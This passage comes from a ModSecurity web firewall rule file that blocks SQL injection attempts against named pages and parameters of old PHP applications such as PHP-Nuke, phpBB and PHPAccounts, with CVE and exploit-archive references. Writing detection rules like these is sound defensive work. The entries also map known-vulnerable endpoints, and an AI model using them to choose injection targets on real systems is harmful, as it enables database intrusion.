"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Outgoing_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006527) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Project_ID UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006527,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Project_ID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3345'" SecRule &TX:'/SQL_INJECTION.*ARGS:Project_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Project_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006533) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Client_ID UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006533,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Client_ID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3345'" SecRule &TX:'/SQL_INJECTION.*ARGS:Client_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Client_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006539) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Invoice_ID UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006539,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Invoice_ID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3345'" SecRule &TX:'/SQL_INJECTION.*ARGS:Invoice_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Invoice_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006545) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Vendor_ID UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006545,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Vendor_ID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3345'" SecRule &TX:'/SQL_INJECTION.*ARGS:Vendor_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Vendor_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005972) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UPDATE SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005972,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006974) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UPDATE SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006974,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule &TX:'/SQL_INJECTION.*ARGS:hack_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004046) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPEcho CMS SQL Injection Attempt -- gallery.php id UPDATE SecRule REQUEST_LINE "@contains /modules/admin/modules/gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004046,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPEcho CMS SQL Injection Attempt -- gallery.php id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/1937'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPEcho CMS SQL Injection Attempt -- gallery.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003810) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpHoo3 SQL Injection Attempt -- admin.php ADMIN_USER UPDATE SecRule REQUEST_LINE "@contains /admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003810,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpHoo3 SQL Injection Attempt -- admin.php ADMIN_USER UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23854'" SecRule &TX:'/SQL_INJECTION.*ARGS:ADMIN_USER/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpHoo3 SQL Injection Attempt -- admin.php ADMIN_USER UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003816) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpHoo3 SQL Injection Attempt -- admin.php ADMIN_PASS UPDATE SecRule REQUEST_LINE "@contains /admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003816,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpHoo3 SQL Injection Attempt -- admin.php ADMIN_PASS UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23854'" SecRule &TX:'/SQL_INJECTION.*ARGS:ADMIN_PASS/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpHoo3 SQL Injection Attempt -- admin.php ADMIN_PASS UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004700) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UPDATE SecRule REQUEST_LINE "@contains /include.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004700,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21002'" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005789) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPKIT SQL Injection Attempt -- comment.php subid UPDATE SecRule REQUEST_LINE "@contains /comment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005789,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPKIT SQL Injection Attempt -- comment.php subid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21962'" SecRule &TX:'/SQL_INJECTION.*ARGS:subid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPKIT SQL Injection Attempt -- comment.php subid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPWind SQL Injection Attempt -- admin.php UPDATE SecRule REQUEST_LINE "@contains /admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005181,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPWind SQL Injection Attempt -- admin.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2759'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPWind SQL Injection Attempt -- admin.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004330) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- mainfile.php lang UPDATE SecRule REQUEST_LINE "@contains /mainfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004330,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- mainfile.php lang UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22909'" SecRule &TX:'/SQL_INJECTION.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- mainfile.php lang UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004856) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UPDATE SecRule REQUEST_LINE "@contains /modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004856,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3334'" SecRule &TX:'/SQL_INJECTION.*ARGS:category_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005461) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- modules.php active UPDATE SecRule REQUEST_LINE "@contains /admin/modules/modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005461,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- modules.php active UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22116'" SecRule &TX:'/SQL_INJECTION.*ARGS:active/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- modules.php active UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005467) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php ad_class UPDATE SecRule REQUEST_LINE "@contains /modules/Advertising/admin/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005467,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php ad_class UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22116'" SecRule &TX:'/SQL_INJECTION.*ARGS:ad_class/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php ad_class UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005473) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php imageurl UPDATE SecRule REQUEST_LINE "@contains /modules/Advertising/admin/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005473,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php imageurl UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22116'" SecRule &TX:'/SQL_INJECTION.*ARGS:imageurl/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php imageurl UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005479) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php clickurl UPDATE SecRule REQUEST_LINE "@contains /modules/Advertising/admin/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005479,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php clickurl UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22116'" SecRule &TX:'/SQL_INJECTION.*ARGS:clickurl/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php clickurl UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005485) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php ad_code UPDATE SecRule REQUEST_LINE "@contains /modules/Advertising/admin/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005485,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php ad_code UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22116'" SecRule &TX:'/SQL_INJECTION.*ARGS:ad_code/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php ad_code UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005492) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php position UPDATE SecRule REQUEST_LINE "@contains /modules/Advertising/admin/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005492,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php position UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22116'" SecRule &TX:'/SQL_INJECTION.*ARGS:position/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php position UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005590) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- block-Old_Articles.php cat UPDATE SecRule REQUEST_LINE "@contains /blocks/block-Old_Articles.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005590,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- block-Old_Articles.php cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22037'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- block-Old_Articles.php cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006932) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php cid UPDATE SecRule REQUEST_LINE "@contains /modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006932,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php cid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/437835/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006938) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php pid UPDATE SecRule REQUEST_LINE "@contains /modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006938,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php pid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/437835/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:pid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php pid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php sid UPDATE SecRule REQUEST_LINE "@contains /modules/News/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007181,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php sid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452553/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php sid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011137) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke viewslink module sid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /links.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011137,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke viewslink module sid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,39925'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains op=viewslink&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke viewslink module sid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011172) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke FriendSend module sid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /friend.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011172,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke FriendSend module sid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,39992'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains op=FriendSend&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke FriendSend module sid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005906) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newmessage UPDATE SecRule REQUEST_LINE "@contains /code/guestadd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005906,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newmessage UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3017'" SecRule &TX:'/SQL_INJECTION.*ARGS:newmessage/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newmessage UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005912) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newname UPDATE SecRule REQUEST_LINE "@contains /code/guestadd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005912,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newname UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3017'" SecRule &TX:'/SQL_INJECTION.*ARGS:newname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005918) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newwebsite UPDATE SecRule REQUEST_LINE "@contains /code/guestadd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005918,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newwebsite UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3017'" SecRule &TX:'/SQL_INJECTION.*ARGS:newwebsite/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newwebsite UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005924) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newemail UPDATE SecRule REQUEST_LINE "@contains /code/guestadd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005924,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newemail UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3017'" SecRule &TX:'/SQL_INJECTION.*ARGS:newemail/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newemail UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004611) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004611,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c 